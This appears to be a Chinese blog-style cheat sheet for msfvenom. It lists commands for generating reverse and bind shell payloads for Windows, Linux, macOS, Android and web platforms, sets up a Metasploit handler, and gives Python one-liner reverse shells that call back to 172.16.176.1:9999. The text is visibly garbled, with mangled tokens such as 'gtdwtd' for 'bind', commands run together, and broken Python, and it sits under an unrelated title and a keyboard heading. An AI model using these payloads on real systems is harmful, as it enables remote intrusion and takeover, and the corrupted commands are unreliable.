首页 > 编程知识 正文

linux动态加载模块的命令,msfvenom是什么

时间:2023-05-04 09:43:50 阅读:151267 作者:2020

8种机械键盘轴体的比较

本人要买写代码的键盘,红轴和茶轴怎么选?

查看payloads : MSF venom-- list payloads

显示支持的文件格式: msfvenom --help-formats

查看payload所需参数: MSF venom-pxxx---- payload-options

编码参数-使用ex86/Shi kata _ ga _ nai-i5-b ' x00 '//Shi kata _ ga _ nai编码器进行五次编码,消除空格字符

一般payload windows/shell _ GTD wtd _ TCP

windows/meterpreter/gtdwtd_tcp

windows/meter preter/reverse _ TCP

windows/x64/meter preter/reverse _ TCP

Linux/x86/shell _ GTD wtd _ TCP

Linux/x86/meter preter _ reverse _ TCP

系统支付

linuxmsfvenom-p Linux/x86/meter preter/reverse _ tcpl host=xxxl port=XXX-felfshell.elf

windows

messageboxtestmsfvenom-ax86-p windows/messagebox text=' hello,it is a test '

在windows上生成32位/64位payload时需要小心。 MSF venom-ax86---platform windows-p windows/shell _ GTD wtd _ tcpl host=xxxl port=XXX-fexeshell.exe

MSF venom-p windows/meter preter/reverse _ tcpl host=xxxl port=XXX-fexeshell.exe

MSF venom-p windows/x64/meter preter/reverse _ tcpl host=xxxl port=XXX-fexeshell.exe

例如,在windows/meter preter/reverse _ TCP中,此payload的缺省值为32位。 也可以使用-a x86选项指定。

如果生成64位,则payload为windows/x64/meter preter/reverse _ TCP。

Netcat

nc正向连接MSF venom-p windows/shell _ hidden _ GTD wtd _ TCP rhost=192.168.0.107 lport=8956-fexe1. exe

nc反向连接,拦截MSF venom-p windows/shell _ reverse _ tcpl host=192.168.0.107 lport=888-fexe1. exe

macmsfvenom-POSx/x86/壳_ reverse _ tcpl host=xxxl port=XXX-FM acho壳. macho

androidmsfvenom-adalvik-p Android/meter preter/reverse _ tcpl host=xxxl port=XXX-frawshell.apk

Web Payloads

pppmsfvenom-pphp/meter preter _ reverse _ tcpl host=xxxl port=XXX-frawshell.PHP

cat shell.php | pbcopy echo '? PHP '|tr-d ' n ' shell.phppbpaste shell.PHP

aspmsfvenom-p windows/meter preter/reverse _ tcpl host=xxxl port=XXX-fasp shell.ASP

jspmsfvenom-p Java/JSP _ shell _ reverse _ tcpl host=xxxl port=XXX-fraw shell.JSP

warmsfvenom-p Java/JSP _ shell _ reverse _ tcpl host=xxxl port=XXX-fwarshell.war

pythonmsfvenom-pcmd/UNIX/reverse _ python lhost=xxxl port=XXX-frawshell.py

MSF venom-a python-p python/meter preter/reverse _ tcpl host=xxxl port=XXX-frawshell.py

shell python/python3- c ' importsocket,subprocess,os; s=socket.socket(socket.af_inet,socket.SOCK_STREAM ); s.connect((172.16.176.1 ),9999 ); OS.dup2(s.Fileno ),0 ); OS.dup2(s.Fileno ),1 ); OS.dup2(s.Fileno ),2 ); p=subprocess.call;' /gtdwt/bash ','-I ';'

python/python3- c ' exec (importsocket,subprocess; s=socket.socket (; s.connect((172.16.176.1 ),9999 ) ) n while 1: proc=subprocess.popen ) s.recv ),shell=True,shell s .

bashmsfvenom-pcmd/UNIX/reverse _ bash lhost=xxxl port=XXX-frawshell.sh

perlmsfvenom-pcmd/UNIX/reverse _ perl lhost=xxxl port=XXX-frawshell.pl

MSF拦截use exploit/multi/handler

设置支付

set RHOST

set RPORT

set LHOST

set LPORT

set exitonsession假

exploit -j -z

其他设定

AutoRunScript :自动执行脚本

例如,自动运行post/windows/manage/migrate模块并将其注入其他进程的setautorunscriptpost/windows/manage/migrate

自动注入过程设置预迁移真

setprependmigrateprocsvchost.exe

如果辅助配置set exitonsession false //,则已建立监听的端口将继续保持监听状态,并可以接受多个会话

获取set stagerverifysslcert false//shell时防止SSL_accept错误

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。